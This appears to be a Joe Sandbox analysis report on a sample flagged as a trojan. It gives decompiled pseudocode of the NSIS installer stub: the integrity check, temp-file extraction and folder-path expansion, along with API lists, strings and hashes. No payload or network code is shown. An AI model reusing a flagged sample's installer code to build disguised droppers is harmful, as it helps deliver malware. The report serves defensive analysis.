                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                          • API String ID: 1975747703-1826959635
                                                                                                                          • Opcode ID: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                                                                                          • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                                                          • Opcode Fuzzy Hash: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                                                                                          • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 380 40336a-40336e 378->380 387 403243-403251 call 40302e 379->387 388 40315e 379->388 395 403322-403327 387->395 396 403257-40325a 387->396 389 403163-40317a 388->389 391 40317c 389->391 392 40317e-403187 call 4035e2 389->392 391->392 401 40318d-403194 392->401 402 4032de-4032e6 call 40302e 392->402 395->380 397 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 396->397 398 40325c-403274 call 4035f8 call 4035e2 396->398 426 4032d4-4032d9 397->426 427 4032e8-403318 call 4035f8 call 403371 397->427 398->395 421 40327a-403280 398->421 405 403210-403214 401->405 406 403196-4031aa call 406113 401->406 402->395 410 403216-40321d call 40302e 405->410 411 40321e-403224 405->411 406->411 424 4031ac-4031b3 406->424 410->411 417 403233-40323b 411->417 418 403226-403230 call 406b22 411->418 417->389 425 403241 417->425 418->417 421->395 421->397 424->411 430 4031b5-4031bc 424->430 425->387 426->380 435 40331d-403320 427->435 430->411 432 4031be-4031c5 430->432 432->411 434 4031c7-4031ce 432->434 434->411 436 4031d0-4031f0 434->436 435->395 437 403329-40333a 435->437 436->395 438 4031f6-4031fa 436->438 439 403342-403347 437->439 440 40333c 437->440 441 403202-40320a 438->441 442 4031fc-403200 438->442 444 403348-40334e 439->444 440->439 441->411 443 40320c-40320e 441->443 442->425 442->441 443->411 444->444 445 403350-403368 call 406113 444->445 445->380
                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E004030D0(void* __eflags, signed int _a4) {
                                                                                                                          				DWORD* _v8;
                                                                                                                          				DWORD* _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				long _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				short _v560;
                                                                                                                          				signed int _t54;
                                                                                                                          				void* _t57;
                                                                                                                          				void* _t62;
                                                                                                                          				intOrPtr _t65;
                                                                                                                          				void* _t68;
                                                                                                                          				intOrPtr* _t70;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				signed int _t77;
                                                                                                                          				signed int _t82;
                                                                                                                          				signed int _t83;
                                                                                                                          				signed int _t89;
                                                                                                                          				intOrPtr _t92;
                                                                                                                          				long _t94;
                                                                                                                          				signed int _t102;
                                                                                                                          				signed int _t104;
                                                                                                                          				void* _t106;
                                                                                                                          				signed int _t107;
                                                                                                                          				signed int _t110;
                                                                                                                          				void* _t111;
                                                                                                                          
                                                                                                                          				_t94 = 0;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                                                                          				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe", 0x400);
                                                                                                                          				_t106 = E00406158(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe", 0x80000000, 3);
                                                                                                                          				 *0x40a018 = _t106;
                                                                                                                          				if(_t106 == 0xffffffff) {
                                                                                                                          					return L"Error launching installer";
                                                                                                                          				}
                                                                                                                          				E00406668(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe");
                                                                                                                          				E00406668(0x439000, E00405F83(L"C:\\Users\\Arthur\\Desktop"));
                                                                                                                          				_t54 = GetFileSize(_t106, 0);
                                                                                                                          				__eflags = _t54;
                                                                                                                          				 *0x420f00 = _t54;
                                                                                                                          				_t110 = _t54;
                                                                                                                          				if(_t54 <= 0) {
                                                                                                                          					L24:
                                                                                                                          					E0040302E(1);
                                                                                                                          					__eflags =  *0x42a274 - _t94;
                                                                                                                          					if( *0x42a274 == _t94) {
                                                                                                                          						goto L32;
                                                                                                                          					}
                                                                                                                          					__eflags = _v12 - _t94;
                                                                                                                          					if(_v12 == _t94) {
                                                                                                                          						L28:
                                                                                                                          						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                          						_t111 = _t57;
                                                                                                                          						E00406B90(0x40ce68);
                                                                                                                          						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
                                                                                                                          						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                                                          						__eflags = _t62 - 0xffffffff;
                                                                                                                          						 *0x40a01c = _t62;
                                                                                                                          						if(_t62 != 0xffffffff) {
                                                                                                                          							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                                                                          							 *0x420f04 = _t65;
                                                                                                                          							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                          							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                                                          							__eflags = _t68 - _v20;
                                                                                                                          							if(_t68 == _v20) {
                                                                                                                          								__eflags = _v40 & 0x00000001;
                                                                                                                          								 *0x42a270 = _t111;
                                                                                                                          								 *0x42a278 =  *_t111;
                                                                                                                          								if((_v40 & 0x00000001) != 0) {
                                                                                                                          									 *0x42a27c =  *0x42a27c + 1;
                                                                                                                          									__eflags =  *0x42a27c;
                                                                                                                          								}
                                                                                                                          								_t45 = _t111 + 0x44; // 0x44
                                                                                                                          								_t70 = _t45;
                                                                                                                          								_t102 = 8;
                                                                                                                          								do {
                                                                                                                          									_t70 = _t70 - 8;
                                                                                                                          									 *_t70 =  *_t70 + _t111;
                                                                                                                          									_t102 = _t102 - 1;
                                                                                                                          									__eflags = _t102;
                                                                                                                          								} while (_t102 != 0);
                                                                                                                          								_t71 =  *0x420ef4; // 0x52b8
                                                                                                                          								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
                                                                                                                          								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                                                                          								__eflags = 0;
                                                                                                                          								return 0;
                                                                                                                          							}
                                                                                                                          							goto L32;
                                                                                                                          						}
                                                                                                                          						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                          					}
                                                                                                                          					E004035F8( *0x420ef0);
                                                                                                                          					_t77 = E004035E2( &_a4, 4);
                                                                                                                          					__eflags = _t77;
                                                                                                                          					if(_t77 == 0) {
                                                                                                                          						goto L32;
                                                                                                                          					}
                                                                                                                          					__eflags = _v8 - _a4;
                                                                                                                          					if(_v8 != _a4) {
                                                                                                                          						goto L32;
                                                                                                                          					}
                                                                                                                          					goto L28;
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						_t107 = _t110;
                                                                                                                          						asm("sbb eax, eax");
                                                                                                                          						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                                                                                          						__eflags = _t110 - _t82;
                                                                                                                          						if(_t110 >= _t82) {
                                                                                                                          							_t107 = _t82;
                                                                                                                          						}
                                                                                                                          						_t83 = E004035E2(0x418ef0, _t107);
                                                                                                                          						__eflags = _t83;
                                                                                                                          						if(_t83 == 0) {
                                                                                                                          							E0040302E(1);
                                                                                                                          							L32:
                                                                                                                          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                          						}
                                                                                                                          						__eflags =  *0x42a274;
                                                                                                                          						if( *0x42a274 != 0) {
                                                                                                                          							__eflags = _a4 & 0x00000002;
                                                                                                                          							if((_a4 & 0x00000002) == 0) {
                                                                                                                          								E0040302E(0);
                                                                                                                          							}
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						E00406113( &_v40, 0x418ef0, 0x1c);
                                                                                                                          						_t89 = _v40;
                                                                                                                          						__eflags = _t89 & 0xfffffff0;
                                                                                                                          						if((_t89 & 0xfffffff0) != 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v36 - 0xdeadbeef;
                                                                                                                          						if(_v36 != 0xdeadbeef) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v24 - 0x74736e49;
                                                                                                                          						if(_v24 != 0x74736e49) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v28 - 0x74666f73;
                                                                                                                          						if(_v28 != 0x74666f73) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v32 - 0x6c6c754e;
                                                                                                                          						if(_v32 != 0x6c6c754e) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						_a4 = _a4 | _t89;
                                                                                                                          						_t104 =  *0x420ef0; // 0x195ae
                                                                                                                          						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                                                                          						_t92 = _v16;
                                                                                                                          						__eflags = _t92 - _t110;
                                                                                                                          						 *0x42a274 = _t104;
                                                                                                                          						if(_t92 > _t110) {
                                                                                                                          							goto L32;
                                                                                                                          						}
                                                                                                                          						__eflags = _a4 & 0x00000008;
                                                                                                                          						if((_a4 & 0x00000008) != 0) {
                                                                                                                          							L16:
                                                                                                                          							_v12 = _v12 + 1;
                                                                                                                          							_t110 = _t92 - 4;
                                                                                                                          							__eflags = _t107 - _t110;
                                                                                                                          							if(_t107 > _t110) {
                                                                                                                          								_t107 = _t110;
                                                                                                                          							}
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _a4 & 0x00000004;
                                                                                                                          						if((_a4 & 0x00000004) != 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						goto L16;
                                                                                                                          						L20:
                                                                                                                          						__eflags = _t110 -  *0x420f00; // 0x20193
                                                                                                                          						if(__eflags < 0) {
                                                                                                                          							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                                                                                          						}
                                                                                                                          						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                                                                          						_t110 = _t110 - _t107;
                                                                                                                          						__eflags = _t110;
                                                                                                                          					} while (_t110 != 0);
                                                                                                                          					_t94 = 0;
                                                                                                                          					__eflags = 0;
                                                                                                                          					goto L24;
                                                                                                                          				}
                                                                                                                          			}
































                                                                                                                          0x004030db
                                                                                                                          0x004030de
                                                                                                                          0x004030e1
                                                                                                                          0x004030fb
                                                                                                                          0x00403100
                                                                                                                          0x00403113
                                                                                                                          0x00403118
                                                                                                                          0x0040311e
                                                                                                                          0x00000000
                                                                                                                          0x00403120
                                                                                                                          0x00403131
                                                                                                                          0x00403142
                                                                                                                          0x00403149
                                                                                                                          0x0040314f
                                                                                                                          0x00403151
                                                                                                                          0x00403156
                                                                                                                          0x00403158
                                                                                                                          0x00403243
                                                                                                                          0x00403245
                                                                                                                          0x0040324a
                                                                                                                          0x00403251
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403257
                                                                                                                          0x0040325a
                                                                                                                          0x00403286
                                                                                                                          0x0040328b
                                                                                                                          0x00403296
                                                                                                                          0x00403298
                                                                                                                          0x004032a9
                                                                                                                          0x004032c4
                                                                                                                          0x004032ca
                                                                                                                          0x004032cd
                                                                                                                          0x004032d2
                                                                                                                          0x004032f1
                                                                                                                          0x00403301
                                                                                                                          0x00403313
                                                                                                                          0x00403318
                                                                                                                          0x0040331d
                                                                                                                          0x00403320
                                                                                                                          0x00403329
                                                                                                                          0x0040332d
                                                                                                                          0x00403335
                                                                                                                          0x0040333a
                                                                                                                          0x0040333c
                                                                                                                          0x0040333c
                                                                                                                          0x0040333c
                                                                                                                          0x00403344
                                                                                                                          0x00403344
                                                                                                                          0x00403347
                                                                                                                          0x00403348
                                                                                                                          0x00403348
                                                                                                                          0x0040334b
                                                                                                                          0x0040334d
                                                                                                                          0x0040334d
                                                                                                                          0x0040334d
                                                                                                                          0x00403350
                                                                                                                          0x00403357
                                                                                                                          0x00403363
                                                                                                                          0x00403368
                                                                                                                          0x00000000
                                                                                                                          0x00403368
                                                                                                                          0x00000000
                                                                                                                          0x00403320
                                                                                                                          0x00000000
                                                                                                                          0x004032d4
                                                                                                                          0x00403262
                                                                                                                          0x0040326d
                                                                                                                          0x00403272
                                                                                                                          0x00403274
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040327d
                                                                                                                          0x00403280
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040315e
                                                                                                                          0x00403163
                                                                                                                          0x00403168
                                                                                                                          0x0040316c
                                                                                                                          0x00403173
                                                                                                                          0x00403178
                                                                                                                          0x0040317a
                                                                                                                          0x0040317c
                                                                                                                          0x0040317c
                                                                                                                          0x00403180
                                                                                                                          0x00403185
                                                                                                                          0x00403187
                                                                                                                          0x004032e0
                                                                                                                          0x00403322
                                                                                                                          0x00000000
                                                                                                                          0x00403322
                                                                                                                          0x0040318d
                                                                                                                          0x00403194
                                                                                                                          0x00403210
                                                                                                                          0x00403214
                                                                                                                          0x00403218
                                                                                                                          0x0040321d
                                                                                                                          0x00000000
                                                                                                                          0x00403214
                                                                                                                          0x0040319d
                                                                                                                          0x004031a2
                                                                                                                          0x004031a5
                                                                                                                          0x004031aa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031ac
                                                                                                                          0x004031b3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031b5
                                                                                                                          0x004031bc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031be
                                                                                                                          0x004031c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031c7
                                                                                                                          0x004031ce
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031d0
                                                                                                                          0x004031d6
                                                                                                                          0x004031df
                                                                                                                          0x004031e5
                                                                                                                          0x004031e8
                                                                                                                          0x004031ea
                                                                                                                          0x004031f0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031f6
                                                                                                                          0x004031fa
                                                                                                                          0x00403202
                                                                                                                          0x00403202
                                                                                                                          0x00403205
                                                                                                                          0x00403208
                                                                                                                          0x0040320a
                                                                                                                          0x0040320c
                                                                                                                          0x0040320c
                                                                                                                          0x00000000
                                                                                                                          0x0040320a
                                                                                                                          0x004031fc
                                                                                                                          0x00403200
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040321e
                                                                                                                          0x0040321e
                                                                                                                          0x00403224
                                                                                                                          0x00403230
                                                                                                                          0x00403230
                                                                                                                          0x00403233
                                                                                                                          0x00403239
                                                                                                                          0x00403239
                                                                                                                          0x00403239
                                                                                                                          0x00403241
                                                                                                                          0x00403241
                                                                                                                          0x00000000
                                                                                                                          0x00403241

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 004030E4
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,00000400), ref: 00403100
                                                                                                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,80000000,00000003), ref: 0040615C
                                                                                                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,80000000,00000003), ref: 00403149
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                          • API String ID: 2803837635-1812275689
                                                                                                                          • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                          • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                                                          • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                                                          • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 448 4066a5-4066b0 449 4066b2-4066c1 448->449 450 4066c3-4066d9 448->450 449->450 451 4066f1-4066fa 450->451 452 4066db-4066e8 450->452 453 406700 451->453 454 4068d5-4068e0 451->454 452->451 455 4066ea-4066ed 452->455 456 406705-406712 453->456 457 4068e2-4068e6 call 406668 454->457 458 4068eb-4068ec 454->458 455->451 456->454 459 406718-406721 456->459 457->458 461 4068b3 459->461 462 406727-406764 459->462 465 4068c1-4068c4 461->465 466 4068b5-4068bf 461->466 463 406857-40685c 462->463 464 40676a-406771 462->464 468 40685e-406864 463->468 469 40688f-406894 463->469 470 406773-406775 464->470 471 406776-406778 464->471 467 4068c6-4068cf 465->467 466->467 467->454 472 406702 467->472 473 406874-406880 call 406668 468->473 474 406866-406872 call 4065af 468->474 477 4068a3-4068b1 lstrlenW 469->477 478 406896-40689e call 4066a5 469->478 470->471 475 4067b5-4067b8 471->475 476 40677a-406798 call 406536 471->476 472->456 489 406885-40688b 473->489 474->489 483 4067c8-4067cb 475->483 484 4067ba-4067c6 GetSystemDirectoryW 475->484 490 40679d-4067a1 476->490 477->467 478->477 486 406834-406836 483->486 487 4067cd-4067db GetWindowsDirectoryW 483->487 485 406838-40683c 484->485 493 40683e-406842 485->493 494 40684f-406855 call 4068ef 485->494 486->485 492 4067dd-4067e5 486->492 487->486 489->477 491 40688d 489->491 490->493 495 4067a7-4067b0 call 4066a5 490->495 491->494 496 4067e7-4067f0 492->496 497 4067fc-406812 SHGetSpecialFolderLocation 492->497 493->494 498 406844-40684a lstrcatW 493->498 494->477 495->485 505 4067f8-4067fa 496->505 501 406830 497->501 502 406814-40682e SHGetPathFromIDListW CoTaskMemFree 497->502 498->494 501->486 502->485 502->501 505->485 505->497
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                                                                                          				struct _ITEMIDLIST* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _t44;
                                                                                                                          				WCHAR* _t45;
                                                                                                                          				signed char _t47;
                                                                                                                          				signed int _t48;
                                                                                                                          				short _t59;
                                                                                                                          				short _t61;
                                                                                                                          				short _t63;
                                                                                                                          				void* _t71;
                                                                                                                          				signed int _t77;
                                                                                                                          				signed int _t78;
                                                                                                                          				short _t81;
                                                                                                                          				short _t82;
                                                                                                                          				signed char _t84;
                                                                                                                          				signed int _t85;
                                                                                                                          				void* _t98;
                                                                                                                          				void* _t104;
                                                                                                                          				intOrPtr* _t105;
                                                                                                                          				void* _t107;
                                                                                                                          				WCHAR* _t108;
                                                                                                                          				void* _t110;
                                                                                                                          
                                                                                                                          				_t107 = __esi;
                                                                                                                          				_t104 = __edi;
                                                                                                                          				_t71 = __ebx;
                                                                                                                          				_t44 = _a8;
                                                                                                                          				if(_t44 < 0) {
                                                                                                                          					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                                                                                          				}
                                                                                                                          				_push(_t71);
                                                                                                                          				_push(_t107);
                                                                                                                          				_push(_t104);
                                                                                                                          				_t105 =  *0x42a298 + _t44 * 2;
                                                                                                                          				_t45 = 0x428200;
                                                                                                                          				_t108 = 0x428200;
                                                                                                                          				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                                                                                          					_t108 = _a4;
                                                                                                                          					_a4 = _a4 & 0x00000000;
                                                                                                                          				}
                                                                                                                          				_t81 =  *_t105;
                                                                                                                          				_a8 = _t81;
                                                                                                                          				if(_t81 == 0) {
                                                                                                                          					L43:
                                                                                                                          					 *_t108 =  *_t108 & 0x00000000;
                                                                                                                          					if(_a4 == 0) {
                                                                                                                          						return _t45;
                                                                                                                          					}
                                                                                                                          					return E00406668(_a4, _t45);
                                                                                                                          				} else {
                                                                                                                          					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                                                                                          						_t98 = 2;
                                                                                                                          						_t105 = _t105 + _t98;
                                                                                                                          						if(_t81 >= 4) {
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								 *_t108 = _t81;
                                                                                                                          								_t108 = _t108 + _t98;
                                                                                                                          								__eflags = _t108;
                                                                                                                          							} else {
                                                                                                                          								 *_t108 =  *_t105;
                                                                                                                          								_t108 = _t108 + _t98;
                                                                                                                          								_t105 = _t105 + _t98;
                                                                                                                          							}
                                                                                                                          							L42:
                                                                                                                          							_t82 =  *_t105;
                                                                                                                          							_a8 = _t82;
                                                                                                                          							if(_t82 != 0) {
                                                                                                                          								_t81 = _a8;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							goto L43;
                                                                                                                          						}
                                                                                                                          						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                                                                                          						_t47 =  *_t105;
                                                                                                                          						_t48 = _t47 & 0x000000ff;
                                                                                                                          						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                                                                                          						_t85 = _t84 & 0x000000ff;
                                                                                                                          						_v28 = _t48 | 0x00008000;
                                                                                                                          						_t77 = 2;
                                                                                                                          						_v16 = _t85;
                                                                                                                          						_t105 = _t105 + _t77;
                                                                                                                          						_v24 = _t48;
                                                                                                                          						_v20 = _t85 | 0x00008000;
                                                                                                                          						if(_a8 != _t77) {
                                                                                                                          							__eflags = _a8 - 3;
                                                                                                                          							if(_a8 != 3) {
                                                                                                                          								__eflags = _a8 - 1;
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									__eflags = (_t48 | 0xffffffff) - _v12;
                                                                                                                          									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                                                                                          								}
                                                                                                                          								L38:
                                                                                                                          								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                                                                                          								_t45 = 0x428200;
                                                                                                                          								goto L42;
                                                                                                                          							}
                                                                                                                          							_t78 = _v12;
                                                                                                                          							__eflags = _t78 - 0x1d;
                                                                                                                          							if(_t78 != 0x1d) {
                                                                                                                          								__eflags = (_t78 << 0xb) + 0x42b000;
                                                                                                                          								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                                                                                          							} else {
                                                                                                                          								E004065AF(_t108,  *0x42a268);
                                                                                                                          							}
                                                                                                                          							__eflags = _t78 + 0xffffffeb - 7;
                                                                                                                          							if(__eflags < 0) {
                                                                                                                          								L29:
                                                                                                                          								E004068EF(_t108);
                                                                                                                          							}
                                                                                                                          							goto L38;
                                                                                                                          						}
                                                                                                                          						if( *0x42a2e4 != 0) {
                                                                                                                          							_t77 = 4;
                                                                                                                          						}
                                                                                                                          						_t121 = _t48;
                                                                                                                          						if(_t48 >= 0) {
                                                                                                                          							__eflags = _t48 - 0x25;
                                                                                                                          							if(_t48 != 0x25) {
                                                                                                                          								__eflags = _t48 - 0x24;
                                                                                                                          								if(_t48 == 0x24) {
                                                                                                                          									GetWindowsDirectoryW(_t108, 0x400);
                                                                                                                          									_t77 = 0;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									__eflags = _t77;
                                                                                                                          									if(_t77 == 0) {
                                                                                                                          										goto L26;
                                                                                                                          									}
                                                                                                                          									_t59 =  *0x42a264;
                                                                                                                          									_t77 = _t77 - 1;
                                                                                                                          									__eflags = _t59;
                                                                                                                          									if(_t59 == 0) {
                                                                                                                          										L22:
                                                                                                                          										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                                                                                          										__eflags = _t61;
                                                                                                                          										if(_t61 != 0) {
                                                                                                                          											L24:
                                                                                                                          											 *_t108 =  *_t108 & 0x00000000;
                                                                                                                          											__eflags =  *_t108;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                                                                                          										_a8 = _t61;
                                                                                                                          										__imp__CoTaskMemFree(_v8);
                                                                                                                          										__eflags = _a8;
                                                                                                                          										if(_a8 != 0) {
                                                                                                                          											goto L26;
                                                                                                                          										}
                                                                                                                          										goto L24;
                                                                                                                          									}
                                                                                                                          									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
                                                                                                                          									__eflags = _t63;
                                                                                                                          									if(_t63 == 0) {
                                                                                                                          										goto L26;
                                                                                                                          									}
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          								goto L26;
                                                                                                                          							}
                                                                                                                          							GetSystemDirectoryW(_t108, 0x400);
                                                                                                                          							goto L26;
                                                                                                                          						} else {
                                                                                                                          							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040); // executed
                                                                                                                          							if( *_t108 != 0) {
                                                                                                                          								L27:
                                                                                                                          								if(_v16 == 0x1a) {
                                                                                                                          									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                          								}
                                                                                                                          								goto L29;
                                                                                                                          							}
                                                                                                                          							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                                                                                          							L26:
                                                                                                                          							if( *_t108 == 0) {
                                                                                                                          								goto L29;
                                                                                                                          							}
                                                                                                                          							goto L27;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L43;
                                                                                                                          				}
                                                                                                                          			}





























                                                                                                                          0x004066a5
                                                                                                                          0x004066a5
                                                                                                                          0x004066a5
                                                                                                                          0x004066ab
                                                                                                                          0x004066b0
                                                                                                                          0x004066c1
                                                                                                                          0x004066c1
                                                                                                                          0x004066c9
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cc
                                                                                                                          0x004066cf
                                                                                                                          0x004066d7
                                                                                                                          0x004066d9
                                                                                                                          0x004066ea
                                                                                                                          0x004066ed
                                                                                                                          0x004066ed
                                                                                                                          0x004066f1
                                                                                                                          0x004066f7
                                                                                                                          0x004066fa
                                                                                                                          0x004068d5
                                                                                                                          0x004068d5
                                                                                                                          0x004068e0
